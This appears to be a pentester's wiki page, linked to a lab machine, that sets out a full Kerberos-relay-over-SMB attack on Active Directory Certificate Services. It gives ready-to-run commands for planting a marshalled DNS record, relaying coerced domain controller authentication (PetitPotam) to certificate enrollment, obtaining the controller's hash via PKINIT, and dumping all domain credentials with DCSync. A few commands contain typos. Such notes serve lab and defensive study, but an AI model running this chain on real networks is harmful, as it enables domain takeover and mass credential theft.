KERBEROS RELAY OVER SMB

PRIMARY CATEGORY → KERBEROS RELAY

Theory

This technique is usually carried out when an operator faces an AD Environment with ADCS deployed in its own DC and the HTTP Web Enrollment Endpoint is enabled

It also applies if NTLM authentication is disabled for the HTTP Web Enrollment Endpoint or for the entire domain

Since an ESC8 cannot be performed, we have to leverage Kerberos Relay in order to bypass one of this restrictions

Workflow

Requirements

Abuse - UNIX-Like

Creating a “Marshall” DNS Record

First of all, we have to leverage a controlled domain account to add an arbitrary DNS record in the Domain DNS zone pointing to our attacker machine

The record must contain an

Marshalled Structure → 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

BloodyAD

Setup

git clone https://github.com/CravateRouge/bloodyAD BloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 bloodyAD.py --host '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --domain '<DOMAIN>' --kerberos add dnsRecord '<STRING>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' '<ATTACKER_IP>'

e.g.

python3 bloodyAD.py --host 'DC01.DOMAIN.INTERNAL' --username '<USER>' --password '<PASSWD>' --domain '<DOMAIN>' --kerberos add dnsRecord 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' '10.10.10.20'

DNSTool

Setup

git clone https://github.com/dirkjanm/krbrelayx KRBRELAYX
cd !$

Usage

python3 dnstool.py --user '<DOMAIN>\<USER>' --password '<PASSWWD>' --kerberos -dc-ip '<DC_IP> --tcp --action add --type A --record '<STRING>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' --data '<ATTACKER_IP>' '<DC_FQDN>'

e.g.

python3 dnstool.py --user 'DOMAIN.INTERNAL\john.doe' --password 'password1234$!' --kerberos -dc-ip '10.10.10.5' --tcp --action add --type A --record 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' --data '10.10.10.20' 'DC01.domain.internal'

We may face the following error when running the command above

Error

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
Traceback (most recent call last):
  File "/home/al3xbb/HTB/VulnCicada/Tools/KRBRELAYX/dnstool.py", line 615, in <module>
...<SNIP>...
    raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: cicada.vl.

This occurs because the client’s DNS Resolvers do not know how to resolve the domain in question

Simply add the following line to the /etc/resolv.conf file, so the client can send any query name to the specified resolver and it won’t get an NXDOMAIN error

nameserver <DC_IP>
...<SNIP>...

Setting up a Relayer

Then, we have to run a tool that relays the incoming AP_REQ from the victim to the specified target

In this case, we will coerce a DC to send back to us an authentication over a certain protocol that we can relay to the ADCS Web Enrollment Endpoint

Certipy

Setup

mkdir Certipy
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install certipy-ad

Usage

certipy relay -target 'http://<DC_FQDN>' -template DomainController

e.g.

certipy relay -target 'http://DC01.DOMAIN.INTERNAL' -template DomainController

KRBRelayx

Setup

git clone https://github.com/dirkjanm/krbrelayx KRBRELAYX
cd !$

Usage

python3 krbrelayx.py --target 'http://<DC_FQDN>/certsrv/certfnsh.asp' --adcs --template 'DomainController' --victim '<DC_NAME>$'

e.g.

python3 krbrelayx.py --target 'http://DC01.DOMAIN.INTERNAL/certsrv/certfnsh.asp' --adcs --template 'DomainController' --victim 'DC01$'

Listing available Coercion Methods

Setup

pipx install git+https://github.com/Pennyw0rth/NetExec

Usage

Netexec

nxc smb '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --modules coerce_plus

e.g.

nxc smb DC01.DOMAIN.INTERNAL --username 'john.doe' --password 'password1234$!' --modules coerce_plus

Coercing the victim to authenticate back to us using Kerberos

Netexec

Usage

nxc smb '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --module coerce_plus -o LISTENER='<MARSHALL_DNS_RECORD>' METHOD='<SUPPORTED_COERCION_METHOD>

e.g.

nxc smb DC01.DOMAIN.INTERNAL --usernamme 'john.doe' --password 'password1234$!' --module coerce_plus -o LISTENER='DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' METHOD='PetitPotam'

Passing the Certificate + Unpacking the Hash

AS Exchange via PKINIT Certificate Trust

Automated

PtC + UtH

Certipy

certipy auth -dc-ip '<DC_IP>' -domain '<DOMAIN>' -pfx '<PFX_CERT>'

e.g.

certipy auth -dc-ip '10.10.10.5' -domain 'DOMAIN.INTERNAL' -pfx 'DC01.pfx'

Manual

PKINITtools

Setup

git clone https://github.com/dirkjanm/PKINITtools PKINITtools
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

PtC

gettgtpkinit.py

python3 gettgtpkinit.py -dc-ip '<DC_IP>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/<PRINCIPAL> <CCACHE_FILE>'

e.g.

python3 gettgtpkinit.py -dc-ip '10.10.10.5' -cert-pfx 'DC01.pfx' 'DOMAIN.INTERNAL/DC01$' 'DC01$.ccache'

UtH

getnthash.py

export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )

getnthash.py -dc-ip '<DC_IP>' -key '<AS_REP_ENC_KEY>' '<DOMAIN>/<PRINCIPAL>'

e.g.

export KRB5CCNAME=$( realpath DC01\$.ccache )
getnthash.py -dc-ip '10.10.10.5' -key '30398a8858a161928637cd15504f3ffed5dc06cc95dc4a56c60c88719a8ad3bb' 'DOMAIN.INTERNAL/DC01$'

Retrieving Credentials from the Entire Domain

Once we have control over the DC computer account, we can leverage the DRSUAPI RPC interface and authenticate ourselves as the domain account in question in order to perform a DCSync attack

Impacket’s Secretsdump.py

secretsdump.py -k -no-pass '<DC_FQDN>'

e.g.

secretsdump.py -k -no-pass 'DC01.DOMAIN.INTERNAL'

Abuse - Windows

Non-Domain Joined Machine

Requesting a TGT and injecting it to the current Logon Session

Rubeus

Rubeus.exe asktgt /user:<USER> /password:<PASSWD> /dc:<DC_IP> /ptt /nowrap

e.g.

Rubeus.exe asktgt /user:john.doe /password:'password1234$!' /dc:10.10.10.5 /ptt /nowrap

Requesting a RCPSS Service Ticket and injecting it to the current Logon Session

Rubeus

Rubeus.exe asktgs /service:RPCSS/<DC_FQDN> /dc:<DC_IP> /ptt /ticket:<TGT>

e.g.

Rubeus.exe asktgs /service:RPCSS/DC01.DOMAIN.INTERNAL /dc:10.10.10.5 /ptt /ticket:doI...<SNIP>...

Coercion + Relay

RemoteKrbRelay

RemoteKrbRelay.exe -adcs -template 'DomainController' -victim '<DC_FQDN>' -target '<DC_FQDN>' -clsid '<CLSID>'

e.g.

RemoteKrbRelay.exe -adcs -template 'DomainController' -victim 'DC01.DOMAIN.INTERNAL' -victim DC01.DOMAIN.INTERNAL

Then save the resulting base64-encoded certificate and continue as follows from your Linux VM

Resources

Relaying Kerberos over SMB using KRBRelayx.py

XCT: Vuln Cicada

💥Cyb3rBook

Explorer

KERBEROS RELAY OVER SMB

PRIMARY CATEGORY → KERBEROS RELAY

Theory

Workflow

Requirements

Abuse - UNIX-Like

Creating a “Marshall” DNS Record

Setting up a Relayer

Listing available Coercion Methods

Coercing the victim to authenticate back to us using Kerberos

Passing the Certificate + Unpacking the Hash

Automated

Manual

Retrieving Credentials from the Entire Domain

Abuse - Windows

Non-Domain Joined Machine

Requesting a TGT and injecting it to the current Logon Session

Requesting a RCPSS Service Ticket and injecting it to the current Logon Session

Coercion + Relay

Resources

Graph View

Table of Contents

Backlinks